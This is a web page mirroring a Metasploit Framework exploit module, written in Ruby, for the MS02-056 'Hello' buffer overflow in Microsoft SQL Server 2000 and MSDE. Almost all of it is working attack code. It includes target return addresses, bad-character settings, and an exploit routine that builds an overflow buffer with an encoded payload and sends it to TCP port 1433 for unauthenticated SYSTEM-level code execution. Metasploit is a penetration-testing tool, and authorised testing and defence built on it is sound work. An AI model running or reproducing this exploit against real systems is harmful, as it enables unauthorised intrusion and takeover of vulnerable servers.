Book a Demo!
CoCalc Logo Icon
StoreFeaturesDocsShareSupportNewsAboutPoliciesSign UpSign In
rapid7
GitHub Repository: rapid7/metasploit-framework
 Path: blob/master/modules/exploits/windows/mssql/ms02_056_hello.rb
19664 views
1
##

2
# This module requires Metasploit: https://metasploit.com/download

3
# Current source: https://github.com/rapid7/metasploit-framework

4
##

5


6
class MetasploitModule < Msf::Exploit::Remote

7
  Rank = GoodRanking

8


9
  include Msf::Exploit::Remote::MSSQL

10


11
  def initialize(info = {})

12
    super(

13
      update_info(

14
        info,

15
        'Name' => 'MS02-056 Microsoft SQL Server Hello Overflow',

16
        'Description' => %q{

17
          By sending malformed data to TCP port 1433, an

18
          unauthenticated remote attacker could overflow a buffer and

19
          possibly execute code on the server with SYSTEM level

20
          privileges. This module should work against any vulnerable

21
          SQL Server 2000 or MSDE install (< SP3).

22
        },

23
        'Author' => [ 'MC' ],

24
        'License' => MSF_LICENSE,

25
        'References' => [

26
          [ 'CVE', '2002-1123'],

27
          [ 'OSVDB', '10132'],

28
          [ 'BID', '5411'],

29
          [ 'MSB', 'MS02-056'],

30


31
        ],

32
        'Privileged' => true,

33
        'Payload' => {

34
          'Space' => 512,

35
          'BadChars' => "\x00",

36
          'StackAdjustment' => -3500,

37
        },

38
        'Targets' => [

39
          [

40
            'MSSQL 2000 / MSDE <= SP2',

41
            {

42
              'Platform' => 'win',

43
              'Rets' => [0x42b68aba, 0x42d01e50],

44
            },

45
          ],

46
        ],

47
        'Platform' => 'win',

48
        'DisclosureDate' => '2002-08-05',

49
        'DefaultTarget' => 0,

50
        'Notes' => {

51
          'Reliability' => UNKNOWN_RELIABILITY,

52
          'Stability' => UNKNOWN_STABILITY,

53
          'SideEffects' => UNKNOWN_SIDE_EFFECTS

54
        }

55
      )

56
    )

57
  end

58


59
  def check

60
    info = mssql_ping

61
    if (info['ServerName'])

62
      print_status("SQL Server Information:")

63
      info.each_pair { |k, v|

64
        print_status("   #{k + (" " * (15 - k.length))} = #{v}")

65
      }

66
      return Exploit::CheckCode::Detected

67
    end

68
    return Exploit::CheckCode::Safe

69
  end

70


71
  def exploit

72
    connect

73
    buf = "\x12\x01\x00\x34\x00\x00\x00\x00\x00\x00\x15\x00\x06\x01\x00\x1b" +

74
          "\x00\x01\x02\x00\x1c\x00\x0c\x03\x00\x28\x00\x04\xff\x08\x00\x02" +

75
          "\x10\x00\x00\x00" +

76
          rand_text_english(528, payload_badchars) +

77
          "\x1B\xA5\xEE\x34" +

78
          rand_text_english(4, payload_badchars) +

79
          [ target['Rets'][0] ].pack('V') +

80
          [ target['Rets'][1], target['Rets'][1] ].pack('VV') +

81
          '3333' +

82
          [ target['Rets'][1], target['Rets'][1] ].pack('VV') +

83
          rand_text_english(88, payload_badchars) +

84
          payload.encoded +

85
          "\x00\x24\x01\x00\x00"

86


87
    sock.put(buf)

88


89
    handler

90
    disconnect

91
  end

92
end

93


94